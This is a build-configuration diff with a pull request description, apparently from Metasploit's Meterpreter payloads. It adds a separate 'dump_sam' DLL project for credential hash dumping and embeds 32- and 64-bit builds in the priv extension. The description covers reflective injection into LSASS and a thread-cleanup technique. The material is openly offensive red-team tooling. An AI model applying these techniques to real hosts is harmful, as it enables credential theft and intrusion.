+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v141_xp</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>MultiByte</CharacterSet>
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+    <GenerateManifest>false</GenerateManifest>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+    <GenerateManifest>false</GenerateManifest>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+    <GenerateManifest>false</GenerateManifest>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+    <GenerateManifest>false</GenerateManifest>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>
+      </SDLCheck>
+      <PreprocessorDefinitions>DEBUGTRACE;NDEBUG;WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <AdditionalIncludeDirectories>..\..\source\ReflectiveDllInjection\common;..\..\source\ReflectiveDllInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+      <TreatWarningAsError>true</TreatWarningAsError>
+      <MultiProcessorCompilation>true</MultiProcessorCompilation>
+      <Optimization>MaxSpeed</Optimization>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <BufferSecurityCheck>false</BufferSecurityCheck>
+      <FunctionLevelLinking>false</FunctionLevelLinking>
+      <CallingConvention>StdCall</CallingConvention>
+      <CompileAs>CompileAsC</CompileAs>
+      <BasicRuntimeChecks>Default</BasicRuntimeChecks>
+      <SupportJustMyCode>false</SupportJustMyCode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+      <OptimizeReferences>true</OptimizeReferences>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+      <DataExecutionPrevention>false</DataExecutionPrevention>
+      <ModuleDefinitionFile>$(ProjectDir)../../source/dump_sam/dump_sam.def</ModuleDefinitionFile>
+    </Link>
+    <PostBuildEvent>
+      <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
+IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\"
+copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName).debug$(TargetExt)"</Command>
+    </PostBuildEvent>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>false</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>
+      </SDLCheck>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <AdditionalIncludeDirectories>..\..\source\ReflectiveDllInjection\common;..\..\source\ReflectiveDllInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <TreatWarningAsError>true</TreatWarningAsError>
+      <MultiProcessorCompilation>true</MultiProcessorCompilation>
+      <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
+      <BufferSecurityCheck>false</BufferSecurityCheck>
+      <CallingConvention>StdCall</CallingConvention>
+      <CompileAs>CompileAsC</CompileAs>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+      <DataExecutionPrevention>false</DataExecutionPrevention>
+      <EntryPointSymbol>DllMain</EntryPointSymbol>
+      <ModuleDefinitionFile>$(ProjectDir)../../source/dump_sam/dump_sam.def</ModuleDefinitionFile>
+    </Link>
+    <PostBuildEvent>
+      <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
+IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\"
+copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
+    </PostBuildEvent>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>
+      </SDLCheck>
+      <PreprocessorDefinitions>DEBUGTRACE;NDEBUG;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <AdditionalIncludeDirectories>..\..\source\ReflectiveDllInjection\common;..\..\source\ReflectiveDllInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+      <TreatWarningAsError>true</TreatWarningAsError>
+      <MultiProcessorCompilation>true</MultiProcessorCompilation>
+      <Optimization>MaxSpeed</Optimization>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <BufferSecurityCheck>false</BufferSecurityCheck>
+      <FunctionLevelLinking>false</FunctionLevelLinking>
+      <CallingConvention>StdCall</CallingConvention>
+      <CompileAs>CompileAsC</CompileAs>
+      <BasicRuntimeChecks>Default</BasicRuntimeChecks>
+      <SupportJustMyCode>false</SupportJustMyCode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+      <OptimizeReferences>true</OptimizeReferences>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+      <DataExecutionPrevention>false</DataExecutionPrevention>
+      <ModuleDefinitionFile>$(ProjectDir)../../source/dump_sam/dump_sam.def</ModuleDefinitionFile>
+    </Link>
+    <PostBuildEvent>
+      <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
+IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\"
+copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName).debug$(TargetExt)"</Command>
+    </PostBuildEvent>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>false</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>
+      </SDLCheck>
+      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <AdditionalIncludeDirectories>..\..\source\ReflectiveDllInjection\common;..\..\source\ReflectiveDllInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <TreatWarningAsError>true</TreatWarningAsError>
+      <MultiProcessorCompilation>true</MultiProcessorCompilation>
+      <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
+      <BufferSecurityCheck>false</BufferSecurityCheck>
+      <CallingConvention>StdCall</CallingConvention>
+      <CompileAs>CompileAsC</CompileAs>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+      <DataExecutionPrevention>false</DataExecutionPrevention>
+      <EntryPointSymbol>DllMain</EntryPointSymbol>
+      <ModuleDefinitionFile>$(ProjectDir)../../source/dump_sam/dump_sam.def</ModuleDefinitionFile>
+    </Link>
+    <PostBuildEvent>
+      <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
+IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\"
+copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
+    </PostBuildEvent>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="..\..\source\dump_sam\ReflectiveFreeAndExitThread.c" />
+    <ClInclude Include="..\..\source\ReflectiveDLLInjection\dll\src\ReflectiveLoader.c">
+      <FileType>CppCode</FileType>
+    </ClInclude>
+    <ClCompile Include="..\..\source\dump_sam\dump_sam.c" />
+    <ClInclude Include="..\..\source\dump_sam\ReflectiveFreeAndExitThread.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="..\..\source\ReflectiveDLLInjection\common\ReflectiveDLLInjection.h" />
+    <ClInclude Include="..\..\source\dump_sam\dump_sam.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="..\..\source\dump_sam\dump_sam.def" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>

--- a/c/meterpreter/workspace/ext_server_priv/CMakeLists.txt
+++ b/c/meterpreter/workspace/ext_server_priv/CMakeLists.txt
@@ -46,13 +46,16 @@ else()
 endif()
 
 include_directories(../../source/common)
+include_directories(../../source/dump_sam)
 include_directories(../../source/ReflectiveDLLInjection/common)
 include_directories(../../source/extensions/kiwi/mimikatz/inc)
 include_directories(../../source/extensions/kiwi/mimikatz/modules/rpc)
+include_directories(../../workspace/ext_server_priv)
 
 set(SRC_DIR ../../source/extensions/priv)
 file(GLOB SRC_FILES
     ${SRC_DIR}/*.c
+    ${SRC_DIR}/*.rc
     ${MOD_DEF_DIR}/extension.def
     ../../source/extensions/kiwi/mimikatz/modules/rpc/kull_m_rpc_ms-rprn.c
     ../../source/extensions/kiwi/mimikatz/modules/rpc/kull_m_rpc_ms-efsr_c.c

--- a/c/meterpreter/workspace/ext_server_priv/ext_server_priv.vcxproj
+++ b/c/meterpreter/workspace/ext_server_priv/ext_server_priv.vcxproj
@@ -128,7 +128,7 @@
     <ClCompile>
       <Optimization>MinSpace</Optimization>
       <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
-      <AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\modules\rpc;..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\modules\rpc;..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;..\..\source\dump_sam;..\..\workspace\ext_server_priv;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
       <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <StringPooling>true</StringPooling>
       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@@ -180,6 +180,13 @@
 IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\"
 copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
     </PostBuildEvent>
+    <PreBuildEvent>
+      <Command>msbuild.exe /target:Build /property:PlatformToolset=$(PlatformToolset);Configuration=Release;Platform=Win32 ..\dump_sam\dump_sam.sln
+msbuild.exe /target:Build /property:PlatformToolset=$(PlatformToolset);Configuration=Release;Platform=x64 ..\dump_sam\dump_sam.sln</Command>
+    </PreBuildEvent>
+    <PreBuildEvent>
+      <Message>Build the dump_sam solution</Message>
+    </PreBuildEvent>
   </ItemDefinitionGroup>
   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
     <Midl>
@@ -194,7 +201,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
     <ClCompile>
       <Optimization>MinSpace</Optimization>
       <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
-      <AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\modules\rpc;..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\modules\rpc;..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;..\..\source\dump_sam;..\..\workspace\ext_server_priv;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
       <PreprocessorDefinitions>DEBUGTRACE;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <StringPooling>true</StringPooling>
       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@@ -246,6 +253,13 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\"
 copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName).debug$(TargetExt)"</Command>
     </PostBuildEvent>
+    <PreBuildEvent>
+      <Command>msbuild.exe /target:Build /property:PlatformToolset=$(PlatformToolset);Configuration=Debug;Platform=Win32 ..\dump_sam\dump_sam.sln
+msbuild.exe /target:Build /property:PlatformToolset=$(PlatformToolset);Configuration=Debug;Platform=x64 ..\dump_sam\dump_sam.sln</Command>
+    </PreBuildEvent>
+    <PreBuildEvent>
+      <Message>Build the dump_sam solution</Message>
+    </PreBuildEvent>
   </ItemDefinitionGroup>
   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">
     <Midl>
@@ -260,7 +274,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName)
     <ClCompile>
       <Optimization>MinSpace</Optimization>
       <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
-      <AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\modules\rpc;..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\modules\rpc;..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;..\..\source\dump_sam;..\..\workspace\ext_server_priv;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
       <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <StringPooling>true</StringPooling>
       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@@ -312,6 +326,13 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName)
 IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\"
 copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
     </PostBuildEvent>
+    <PreBuildEvent>
+      <Command>msbuild.exe /target:Build /property:PlatformToolset=$(PlatformToolset);Configuration=Release;Platform=Win32 ..\dump_sam\dump_sam.sln
+msbuild.exe /target:Build /property:PlatformToolset=$(PlatformToolset);Configuration=Release;Platform=x64 ..\dump_sam\dump_sam.sln</Command>
+    </PreBuildEvent>
+    <PreBuildEvent>
+      <Message>Build the dump_sam solution</Message>
+    </PreBuildEvent>
   </ItemDefinitionGroup>
   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
     <Midl>
@@ -326,7 +347,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
     <ClCompile>
       <Optimization>MaxSpeed</Optimization>
       <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
-      <AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\modules\rpc;..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\modules\rpc;..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;..\..\source\dump_sam;..\..\workspace\ext_server_priv;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
       <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <StringPooling>true</StringPooling>
       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@@ -378,6 +399,12 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\"
 copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
     </PostBuildEvent>
+    <PreBuildEvent>
+      <Command>msbuild.exe /target:Build /property:PlatformToolset=$(PlatformToolset);Configuration=Release;Platform=x64 ..\dump_sam\dump_sam.sln</Command>
+    </PreBuildEvent>
+    <PreBuildEvent>
+      <Message>Build the dump_sam solution</Message>
+    </PreBuildEvent>
   </ItemDefinitionGroup>
   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
     <Midl>
@@ -392,7 +419,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
     <ClCompile>
       <Optimization>MaxSpeed</Optimization>
       <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
-      <AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\modules\rpc;..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\extensions\kiwi\mimikatz\modules\rpc;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\modules\rpc;..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;..\..\source\dump_sam;..\..\workspace\ext_server_priv;..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\extensions\kiwi\mimikatz\modules\rpc;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
       <PreprocessorDefinitions>DEBUGTRACE;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <StringPooling>true</StringPooling>
       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@@ -444,6 +471,12 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\"
 copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName).debug$(TargetExt)"</Command>
     </PostBuildEvent>
+    <PreBuildEvent>
+      <Command>msbuild.exe /target:Build /property:PlatformToolset=$(PlatformToolset);Configuration=Debug;Platform=x64 ..\dump_sam\dump_sam.sln</Command>
+    </PreBuildEvent>
+    <PreBuildEvent>
+      <Message>Build the dump_sam solution</Message>
+    </PreBuildEvent>
   </ItemDefinitionGroup>
   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">
     <Midl>
@@ -458,7 +491,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName)
     <ClCompile>
       <Optimization>MaxSpeed</Optimization>
       <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
-      <AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\modules\rpc;..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\modules\rpc;..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;..\..\source\dump_sam;..\..\workspace\ext_server_priv;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
       <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <StringPooling>true</StringPooling>
       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@@ -510,6 +543,12 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName)
 IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\"
 copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
     </PostBuildEvent>
+    <PreBuildEvent>
+      <Command>msbuild.exe /target:Build /property:PlatformToolset=$(PlatformToolset);Configuration=Release;Platform=x64 ..\dump_sam\dump_sam.sln</Command>
+    </PreBuildEvent>
+    <PreBuildEvent>
+      <Message>Build the dump_sam solution</Message>
+    </PreBuildEvent>
   </ItemDefinitionGroup>
   <Choose>
     <When Condition="'$(Platform)'=='Win32'" />
@@ -535,6 +574,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
     <ClInclude Include="..\..\source\extensions\priv\priv.h" />
     <ClInclude Include="..\..\source\extensions\priv\service.h" />
     <ClInclude Include="..\..\source\extensions\priv\tokendup.h" />
+    <ClInclude Include="..\..\source\extensions\priv\resource.h" />
   </ItemGroup>
   <ItemGroup>
     <ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\rpc\kull_m_rpc_ms-efsr_c.c" />
@@ -550,6 +590,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
     <ClCompile Include="..\..\source\extensions\priv\service.c" />
     <ClCompile Include="..\..\source\extensions\priv\tokendup.c" />
     <ClCompile Include="..\..\source\logging\logging.c" />
+  </ItemGroup>
+  <ItemGroup>
+    <ResourceCompile Include="..\..\source\extensions\priv\priv.rc">
+      <PreprocessorDefinitions Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">DEBUGTRACE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <PreprocessorDefinitions Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">_WIN64;DEBUGTRACE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <PreprocessorDefinitions Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">_WIN64;NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <PreprocessorDefinitions Condition="'$(Configuration)|$(Platform)'=='Release|x64'">_WIN64;NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ResourceCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="..\..\output\dump_sam.x64.dll" />
+    <None Include="..\..\output\dump_sam.x86.dll" />
   </ItemGroup>
   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
   <ImportGroup Label="ExtensionTargets">


### PR DESCRIPTION
# Overview
This closes rapid7/metasploit-framework#17776 by adding hashdump support to 32-bit Meterpreters running on 64-bit hosts.

## Old Approach
The old approach was to use native code compiled [into Meterpreter](https://github.com/rapid7/metasploit-payloads/blob/cc3459772878c73ba692ea561a6fdbc44d56a809/c/meterpreter/source/extensions/priv/passwd.c#L265-L571) that it would carve out and then copy into an executable segment in the target LSASS process. This was the main source of the limitation because the architecture of LSASS has to match Meterpreter. This meant `dump_sam` was one giant function that couldn't use any external functions so they all had to be passed in through the [FUNCTIONARGS struct ](https://github.com/rapid7/metasploit-payloads/blob/cc3459772878c73ba692ea561a6fdbc44d56a809/c/meterpreter/source/extensions/priv/passwd.c#L65-L115)and be resolved by the injector (meterpreter).

## New Approach
The new approach breaks `dump_sam` into it's own Visual Studio solution file. This allows DLLs for both 32-bit and 64-bit variants to be built. Next the 32-bit Meterpreter embeds both 32-bit and 64-bit variants within it's `priv` extension so it can inject the correct one at run time. The 64-bit Meterpreter will only ever run on systems with a 64-bit version of LSASS so it only embeds the 64-bit version of the DLL. The DLLs are embedded as resources so they don't need to be sent as an argument which retains backwards compatibility because there are no changes necessary in the Metasploit Framework. I tried to make these DLLs as small as possible. In the main MSVC release builds (the ones we ship to users) the export is by ordinal using the new pattern, they are dynamically linked to reduce the size, and the MSVCRT isn't included.

### ReflectiveFreeAndExitThread
Reflective DLLs can not take advantage of [`FreeLibraryAndExitThread`](https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-freelibraryandexitthread) like traditionally loaded DLLs can. This new method allows an RDLL to free it's memory and exit cleanly. It's self contained in it's own files for future reuse, and perhaps it should be moved into the ReflectiveDLLInjection repo. The problem it solves is that the memory in which the RDLL is running was [VirtuallAlloc'ed](https://github.com/rapid7/ReflectiveDLLInjection/blob/db28a174a0c8e77f6f9b387a9b7b6f472ae94d5b/dll/src/ReflectiveLoader.c#L312) by the loader and can't be simply VirtualFree'ed without running into a race condition of the executable code effectively freeing itself. This approach can be broken down into the following steps:

1. A new, suspended thread is created to invoke APCs (referred to as the cleanup thread). This thread uses `ExitThread` as it's starting point to ensure it exits cleanly once it has executed all of the APCs that have been queued to it.
2. A handle to the current/RDLL thread is opened to be passed to the cleanup thread.
